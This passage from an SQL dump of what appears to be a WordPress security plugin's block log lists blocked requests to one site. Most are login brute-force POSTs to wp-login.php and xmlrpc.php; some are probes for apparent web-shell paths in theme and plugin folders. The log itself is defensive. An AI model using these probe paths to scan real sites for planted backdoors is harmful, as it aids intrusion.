Firefox\\/96\"}','CIUlT8PAM5BKJOua2wbtjV37',0,1665493204.8700,3893,'','POST',403,0,515,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','kQsGwrn3P6YMdfmlSjyUKu8x',0,1665489572.4141,4520,'','POST',403,0,600,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','afr5cFW8M4oJUgQjYpzlVe3q',0,1665489278.2693,18688,'','POST',403,0,515,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','l94pAIVOjzoktQZUcgyYDTEu',0,1665488693.4519,1683,'','POST',403,0,515,0,1,'',0),('69.163.152.108',1168349292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','fQqizALDV9mCYn8KwEh5327F',0,1665488531.1093,1201,'','POST',403,0,600,0,1,'',0),('107.189.13.99',1807551843,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','6kqwtu4ag5bv1SAYLe2KpDCm',0,1665488474.2354,1951,'','POST',403,0,515,0,1,'',0),('139.196.152.3',2344916995,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YmFKE4uPb5G1nNhezojSAXqZ',0,1665488380.1845,1431,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cB0eDuw9kxWEnHIUhrd2CPMA',0,1665488124.4442,1243,'','POST',403,0,515,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','RsiSleNXj3OcbECJva0n9tHQ',0,1665487929.5322,1500,'','POST',403,0,600,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mY8USAdZnOE1zkDh56KPMxvG',0,1665487817.6420,18734,'','POST',403,0,515,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','esY2JAoi3VD9W7OGzwNum5T8',0,1665487217.1069,1407,'','POST',403,0,515,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nw4UlR7qSPTCyO2zjxH8DhEX',0,1665486965.2397,992,'','POST',403,0,515,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','HkDifpuR51G6Y7lhyIJcAzVQ',0,1665486892.5396,1483,'','POST',403,0,600,0,1,'',0),('103.146.202.150',1737673366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QnFCBO9Wkia7SLjJ82UcN5rZ',0,1665486062.9802,1605,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OBDeHjEMgKq9VxvU6ws7icSF',0,1665486375.1890,14063,'','POST',403,0,515,0,1,'',0),('116.62.155.4',1950259972,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1CWfoBFOPvhbEl0t2uDksZpx',0,1665492908.3997,18494,'','POST',403,0,515,0,1,'',0),('208.113.153.214',3497105878,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','R8SYlxVPWvz7C3sD4nKXugyO',0,1665493167.9963,17400,'','POST',403,0,600,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','FRlHfNuxYhUbv6Qp1ArXMnKi',0,1665492723.3733,17552,'','POST',403,0,600,0,1,'',0),('172.104.81.115',2892517747,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SKoil8gYMRAbUWPJrL52dfTv',0,1665492580.6592,18417,'','POST',403,0,515,0,1,'',0),('23.99.229.218',392422874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','Pyo5XsxUN029vg4cdRJ8Hik7',0,1665492111.0953,18417,'','POST',403,0,600,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gBv5iIERocfpdzMslNHXmjhP',0,1665491982.9783,18783,'','POST',403,0,515,0,1,'',0),('185.46.121.66',3106830658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ImOUVfR8rcda5E4XeCb6QygH',0,1665491699.4928,2534,'','POST',403,0,515,0,1,'',0),('46.63.80.162',775901346,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','lIwPOczFe2Z57hmbq9sLkviA',0,1665491665.5279,17580,'','POST',403,0,600,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KfXSykzYHDcBwlFiPmRjt0A8',0,1665491362.0192,1390,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J4uArd6wMlUptW73mzkq0INo',0,1665491098.4677,2308,'','POST',403,0,515,0,1,'',0),('173.236.169.240',2917968368,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','Qnrx901BL2kTPq6fouMzUCbW',0,1665491065.4145,18320,'','POST',403,0,600,0,1,'',0),('77.39.212.31',1294455839,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','8EG9clSJoitfRIO3YgHPjZpF',0,1665490618.8872,3156,'','POST',403,0,600,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BERIJcWxSyidZL6XVkwFPM0z',0,1665490148.3320,2384,'','POST',403,0,515,0,1,'',0),('148.72.209.0',2487800064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c9tay2HKViM7UB5IZLRd8JP4',0,1665490470.7817,18855,'','POST',403,0,515,0,1,'',0),('93.114.185.76',1567799628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','OxTHMUup4ZRiYnW5XNEebFd6',0,1665490015.8681,4675,'','POST',403,0,600,0,1,'',0),('159.223.186.76',2682239564,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uAX1aRkCKDcO2Neg3GwimLqp',0,1665489871.2594,7441,'','POST',403,0,515,0,1,'',0),('190.171.170.94',3198921310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dZgTQK7ratqU8PY9lNoi5mRJ',0,1665496758.0394,2865,'','POST',403,0,515,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','OFW4hz5fJ98CYrKatMu2cUAG',0,1665496377.8867,17837,'','POST',403,0,600,0,1,'',0),('205.185.124.182',3451485366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','2Wwrf67lXQLtabBdGekh0DEZ',0,1665495717.5691,2417,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6NIAjtMUu78YypkH91Vdm4xP',0,1665495182.9056,19587,'','POST',403,0,515,0,1,'',0),('198.98.48.183',3328323767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','5cNjYIanposhrVKUPB92wglW',0,1665494971.8983,18737,'','POST',403,0,515,0,1,'',0),('159.89.170.41',2673453609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Yaj15pAPyRVHsBCIDtNkUczh',0,1665494870.8223,19528,'','POST',403,0,515,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HFuNQPMfhm0WLrgspJ8eKI1l',0,1665494577.3896,20039,'','POST',403,0,515,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','xyuQ18tGkpcYXE6ongaHBWOL',0,1665494233.5498,17805,'','POST',403,0,600,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8vZTEDpg0SUHzQBOkKR19Nrh',0,1665493817.8164,2525,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U0JhpFvXgdOVERrbIcSsx3ut',0,1665493544.9827,19639,'','POST',403,0,515,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','zgwsVjF1qdpHAf30IrtLU6QG',0,1665493779.6216,17274,'','POST',403,0,600,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eyuB9pZUag3IcfsnizK4MwdE',0,1665500360.7648,18590,'','POST',403,0,515,0,1,'',0),('15.235.138.120',267094648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2VaSE1bsKM4DpIUer3g8OXdm',0,1665498598.2768,1328,'','POST',403,0,515,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','yEZlAQHkjRCqesuWK0Yowf5G',0,1665498490.6116,14975,'','POST',403,0,600,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4aUz2BDNK10xvoIOCF9yAhpH',0,1665498319.4183,9935,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BKZjwQUIH4fnpzWTq1vXrYyl',0,1665497970.0762,18502,'','POST',403,0,515,0,1,'',0),('66.33.196.103',1109509223,'','http://cteisys.com/old-index.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','Fi09ctMoWkAQRSgTJ2hv46Yu',0,1665497420.0436,369,'','GET',403,0,700,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7kMQpGOvBEXfFIAPtSs1Vcyo',0,1665497396.5413,18720,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KJ5b2Tl1aWExe3vSm7CnyUqi',0,1665497034.2279,11349,'','POST',403,0,515,0,1,'',0),('149.248.59.66',2516073282,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','5iyDx2uWTaPsMvZhqGc4UAYl',0,1665503855.3398,17100,'','POST',403,0,600,0,1,'',0),('162.240.30.198',2733645510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SyAOpwn9uRUZWH8GxJ3EXKqQ',0,1665501760.1889,18308,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','W1wFy7LBSrEz0iRXCApVZaej',0,1665502715.7694,2636,'','POST',403,0,600,0,1,'',0),('65.0.178.38',1090564646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z9A2hJkx3IcMBYSVfopKjlGd',0,1665501102.0330,2668,'','POST',403,0,515,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mcqU4CQy3OjJsxbzoHK01LvZ',0,1665500803.2368,10922,'','POST',403,0,515,0,1,'',0),('173.236.152.148',2917963924,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','6GnMTsprZkUOXFuBy7lv43gx',0,1665500599.6440,1493,'','POST',403,0,600,0,1,'',0),('173.236.176.107',2917970027,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','Ux6bIG12W3cqtHMFh0Xwd45k',0,1665506999.1289,684,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','UR6ktgTDu7EWx1J02jAcNBLn',0,1665506553.0863,17458,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','aMHpWRi47OmdzcVvCI1QGNY0',0,1665506117.4548,20275,'','POST',403,0,515,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','97bVO2iNw3fI4sojKMnWLkex',0,1665504681.6654,18297,'','POST',403,0,600,0,1,'',0),('159.203.121.12',2680912140,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','BeZuo18OcSH92jq4dtQhRKTx',0,1665511532.2956,635,'','POST',403,0,600,0,1,'',0),('173.236.152.148',2917963924,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','FqI0tEdyDpAW7e85TjibQSrl',0,1665510830.4187,1467,'','POST',403,0,600,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','iwk41YtzoXBjRm9LrHqpvEVx',0,1665510459.6604,2429,'','POST',403,0,515,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','R8zKAFCxr7GvmbYpde5ngfjZ',0,1665510381.3054,17642,'','POST',403,0,600,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','tofaVNx7gXd2spkOAzWuSH3m',0,1665508934.4376,2601,'','POST',403,0,515,0,1,'',0),('68.183.71.174',1152862126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','l5KcIPpM3im9e2kN1orwfZSj',0,1665508509.2974,17627,'','POST',403,0,600,0,1,'',0),('144.91.88.30',2421905438,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','iRUGTWSFYcX0mNAyudr2lQCH',0,1665518567.8194,19300,'','POST',403,0,600,0,1,'',0),('78.142.50.85',1317941845,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','wpehqrCLkoYVI4DN25yvMnXj',0,1665514702.1046,17169,'','POST',403,0,600,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','z5dQfoMGeynBaYCJXO6Hh1F0',0,1665514250.3891,17436,'','POST',403,0,600,0,1,'',0),('213.175.66.138',3585032842,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','T8fRzeJuEkwXP1NMVDbHAOnU',0,1665512367.6973,17684,'','POST',403,0,600,0,1,'',0),('136.243.19.225',2297631713,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','GAHf9Vw8NBP0bQ37zaegRTsU',0,1665518110.9557,17456,'','POST',403,0,600,0,1,'',0),('128.199.116.110',2160555118,'','http://cteisys.com/about.php?520=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','plKN92MjPs5wVkrSHcbaxQve',0,1665517698.2595,12143,'','GET',403,0,700,0,1,'',0),('20.26.114.74',337277514,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QJASnwIKrXZPbt9VRqCclM8k',0,1665516559.3622,299,'','GET',403,0,700,0,1,'',0),('20.26.114.74',337277514,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','EHjIDQNphVZBJFAWuie91KLs',0,1665516543.6698,11748,'','GET',403,0,700,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','B9bNcmPVj4hLKEu8rJYf2gOq',0,1665516232.9155,17649,'','POST',403,0,600,0,1,'',0),('37.120.217.243',628677107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NHlS4RbW81yCxofs3UeP9DEd',0,1665515937.8603,19251,'','POST',403,0,515,0,1,'',0),('104.41.221.5',1747574021,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','k2BRYLwqOVUrE4hazgTIXClt',0,1665521987.0061,9517,'','POST',403,0,600,0,1,'',0),('157.245.246.208',2650142416,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','k7QeiwGZgCsTraVucXOKhWxm',0,1665520097.7556,17208,'','POST',403,0,600,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','msE40vUQBPtLiRAlN1If6zjY',0,1665519267.1869,17235,'','POST',403,0,600,0,1,'',0),('64.111.127.191',1081049023,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','qHeBNI3y4cntKk67lpEaXdhz',0,1665535487.6694,17678,'','POST',403,0,600,0,1,'',0),('159.203.121.12',2680912140,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','lgBvm0QnZxMjHWL2RpwEF75J',0,1665534667.6423,17846,'','POST',403,0,600,0,1,'',0),('217.151.98.163',3650577059,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','oEe03nPj9CSbvG1ihZOkQlBK',0,1665528566.6165,2480,'','POST',403,0,515,0,1,'',0),('166.62.125.246',2789113334,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','qVBjKQORZGA47zasIm9kdib5',0,1665527817.0868,18464,'','POST',403,0,600,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/wp-classic_editor/werdt/werd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','UrPMhy1TmFEJBflCSD34sp0n',0,1665527205.2316,277,'','GET',403,0,700,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/lite-cache/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','Of2VKj58dTBEuz4ahHir7pYg',0,1665527110.4473,323,'','GET',403,0,700,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/wp-dester/dester/wp-dester.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) 